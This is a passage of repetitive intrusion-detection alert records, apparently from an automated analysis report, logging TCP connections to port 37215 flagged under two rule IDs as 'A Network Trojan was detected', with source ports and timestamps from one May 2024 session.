            SID:2835222
            Source Port:58962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376903
            SID:2829579
            Source Port:40362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508258
            SID:2829579
            Source Port:37342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319486
            SID:2829579
            Source Port:59998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.947583
            SID:2835222
            Source Port:32800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261307
            SID:2835222
            Source Port:33966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776866
            SID:2829579
            Source Port:47402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.806027
            SID:2835222
            Source Port:59744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.652711
            SID:2835222
            Source Port:36606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945443
            SID:2835222
            Source Port:52402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814308
            SID:2835222
            Source Port:37808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047952
            SID:2835222
            Source Port:40804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917705
            SID:2835222
            Source Port:59582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816734
            SID:2829579
            Source Port:59016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809284
            SID:2829579
            Source Port:36282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.566548
            SID:2829579
            Source Port:38232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922954
            SID:2835222
            Source Port:54008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578453
            SID:2829579
            Source Port:52772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058292
            SID:2835222
            Source Port:46212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805568
            SID:2835222
            Source Port:37722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979606
            SID:2835222
            Source Port:43354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617610
            SID:2829579
            Source Port:42554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868624
            SID:2835222
            Source Port:47578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432727
            SID:2829579
            Source Port:39614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894187
            SID:2835222
            Source Port:57960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811750
            SID:2829579
            Source Port:53216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709991
            SID:2829579
            Source Port:39378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745915
            SID:2829579
            Source Port:38238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336919
            SID:2829579
            Source Port:42796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733776
            SID:2835222
            Source Port:51972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885707
            SID:2829579
            Source Port:58996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542687
            SID:2835222
            Source Port:54422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.740484
            SID:2835222
            Source Port:44336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850627
            SID:2835222
            Source Port:60166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648601
            SID:2835222
            Source Port:43328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074981
            SID:2829579
            Source Port:45360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999285
            SID:2835222
            Source Port:53368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860807
            SID:2835222
            Source Port:46834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969560
            SID:2829579
            Source Port:51078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919879
            SID:2835222
            Source Port:57444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277137
            SID:2835222
            Source Port:60024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860947
            SID:2835222
            Source Port:57284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290881
            SID:2829579
            Source Port:55618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651113
            SID:2835222
            Source Port:59492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060129
            SID:2835222
            Source Port:47366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965865
            SID:2829579
            Source Port:55410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.066980
            SID:2835222
            Source Port:49810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261164
            SID:2829579
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968572
            SID:2829579
            Source Port:47638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597145
            SID:2835222
            Source Port:59014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730478
            SID:2835222
            Source Port:60502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563568
            SID:2835222
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485936
            SID:2829579
            Source Port:45196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880077
            SID:2835222
            Source Port:42072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873588
            SID:2829579
            Source Port:59888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515912
            SID:2835222
            Source Port:53762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.110011
            SID:2835222
            Source Port:55164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743851
            SID:2829579
            Source Port:36066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735007
            SID:2835222
            Source Port:33212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766733
            SID:2835222
            Source Port:47152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639816
            SID:2835222
            Source Port:58468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927885
            SID:2829579
            Source Port:35646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273426
            SID:2829579
            Source Port:53834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387425
            SID:2835222
            Source Port:50118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650418
            SID:2835222
            Source Port:33804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.959287
            SID:2829579
            Source Port:58312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741717
            SID:2835222
            Source Port:60700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919547
            SID:2829579
            Source Port:44636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027829
            SID:2829579
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038242
            SID:2835222
            Source Port:34908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994335
            SID:2829579
            Source Port:57054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062996
            SID:2835222
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880265
            SID:2835222
            Source Port:41256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318145
            SID:2829579
            Source Port:52278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766623
            SID:2829579
            Source Port:37042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869772
            SID:2829579
            Source Port:46358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074248
            SID:2829579
            Source Port:57272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916979
            SID:2835222
            Source Port:57478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572062
            SID:2829579
            Source Port:52206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852962
            SID:2835222
            Source Port:37024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.740289
            SID:2835222
            Source Port:36366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507736
            SID:2829579
            Source Port:42418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809042
            SID:2829579
            Source Port:42458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862086
            SID:2835222
            Source Port:58732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953732
            SID:2835222
            Source Port:50580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.076771
            SID:2835222
            Source Port:57624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936867
            SID:2835222
            Source Port:46108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707695
            SID:2835222
            Source Port:40438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728341
            SID:2829579
            Source Port:39526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.065510
            SID:2835222
            Source Port:59140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.958457
            SID:2835222
            Source Port:40982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769281
            SID:2835222
            Source Port:53884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550391
            SID:2829579
            Source Port:50422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605645
            SID:2829579
            Source Port:60728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.499384
            SID:2835222
            Source Port:53520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725296
            SID:2829579
            Source Port:33008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972703
            SID:2829579
            Source Port:56090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822097
            SID:2835222
            Source Port:42238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869909
            SID:2829579
            Source Port:40818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001420
            SID:2829579
            Source Port:34178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376508
            SID:2829579
            Source Port:39484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780556
            SID:2829579
            Source Port:35490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831715
            SID:2835222
            Source Port:45746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.810402
            SID:2835222
            Source Port:46716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924610
            SID:2835222
            Source Port:52908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941827
            SID:2829579
            Source Port:59194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848421
            SID:2829579
            Source Port:33570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041059
            SID:2829579
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.133889
            SID:2835222
            Source Port:57870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954607
            SID:2829579
            Source Port:38602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733416
            SID:2835222
            Source Port:34852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348074
            SID:2835222
            Source Port:49478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816754
            SID:2829579
            Source Port:35600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922043
            SID:2835222
            Source Port:60490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040394
            SID:2829579
            Source Port:58408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424098
            SID:2835222
            Source Port:37226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343108
            SID:2829579
            Source Port:60126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470787
            SID:2829579
            Source Port:53792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524162
            SID:2829579
            Source Port:40352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506231
            SID:2835222
            Source Port:39302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.667053
            SID:2835222
            Source Port:40870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770555
            SID:2829579
            Source Port:58032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321280
            SID:2829579
            Source Port:36764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067447
            SID:2829579
            Source Port:46130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358903
            SID:2829579
            Source Port:41798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486927
            SID:2829579
            Source Port:43424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952652
            SID:2835222
            Source Port:37004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617980
            SID:2835222
            Source Port:36492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848854
            SID:2829579
            Source Port:60814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910158
            SID:2829579
            Source Port:54840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810199
            SID:2835222
            Source Port:53648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870013
            SID:2835222
            Source Port:40030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059796
            SID:2829579
            Source Port:46246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910534
            SID:2835222
            Source Port:51862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059631
            SID:2829579
            Source Port:43788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892325
            SID:2835222
            Source Port:56000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655898
            SID:2829579
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313252
            SID:2829579
            Source Port:37236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553045
            SID:2835222
            Source Port:51764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842796
            SID:2835222
            Source Port:37890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916753
            SID:2835222
            Source Port:39760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623160
            SID:2835222
            Source Port:53656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669025
            SID:2829579
            Source Port:54862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956287
            SID:2835222
            Source Port:32840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563369
            SID:2835222
            Source Port:39458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913342
            SID:2835222
            Source Port:53112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299741
            SID:2829579
            Source Port:55772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748447
            SID:2835222
            Source Port:40506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321249
            SID:2829579
            Source Port:33498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423134
            SID:2835222
            Source Port:40698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757414
            SID:2829579
            Source Port:54356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615285
            SID:2835222
            Source Port:57852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.927532
            SID:2829579
            Source Port:51824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596818
            SID:2829579
            Source Port:48214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334941
            SID:2829579
            Source Port:57894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816891
            SID:2835222
            Source Port:56174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.057418
            SID:2835222
            Source Port:48594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821810
            SID:2835222
            Source Port:40240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846789
            SID:2829579
            Source Port:51848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640493
            SID:2829579
            Source Port:40212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644082
            SID:2835222
            Source Port:45742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818858
            SID:2829579
            Source Port:51580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067223
            SID:2835222
            Source Port:34020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840934
            SID:2829579
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596840
            SID:2829579
            Source Port:44536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767523
            SID:2829579
            Source Port:37464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946677
            SID:2829579
            Source Port:59592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936905
            SID:2835222
            Source Port:49528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767278
            SID:2835222
            Source Port:34790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926228
            SID:2829579
            Source Port:41000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869935
            SID:2829579
            Source Port:34168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039344
            SID:2829579
            Source Port:42770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808368
            SID:2829579
            Source Port:59248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025232
            SID:2829579
            Source Port:42300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553006
            SID:2829579
            Source Port:41160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934139
            SID:2829579
            Source Port:54848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779688
            SID:2829579
            Source Port:38678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604387
            SID:2835222
            Source Port:56700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863033
            SID:2829579
            Source Port:38612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.842310
            SID:2835222
            Source Port:52380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.059146
            SID:2835222
            Source Port:60612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045824
            SID:2835222
            Source Port:52450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014755
            SID:2835222
            Source Port:37456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.460115
            SID:2829579
            Source Port:51474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527129
            SID:2835222
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601690
            SID:2835222
            Source Port:45196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605605
            SID:2829579
            Source Port:42726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840186
            SID:2835222
            Source Port:55360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486955
            SID:2829579
            Source Port:51190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899802
            SID:2829579
            Source Port:50340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260496
            SID:2829579
            Source Port:42554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279826
            SID:2829579
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778638
            SID:2829579
            Source Port:41336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180774
            SID:2829579
            Source Port:52958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067891
            SID:2835222
            Source Port:57966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069098
            SID:2835222
            Source Port:37820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910151
            SID:2829579
            Source Port:36152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927272
            SID:2835222
            Source Port:51170
            Destination Port:37215
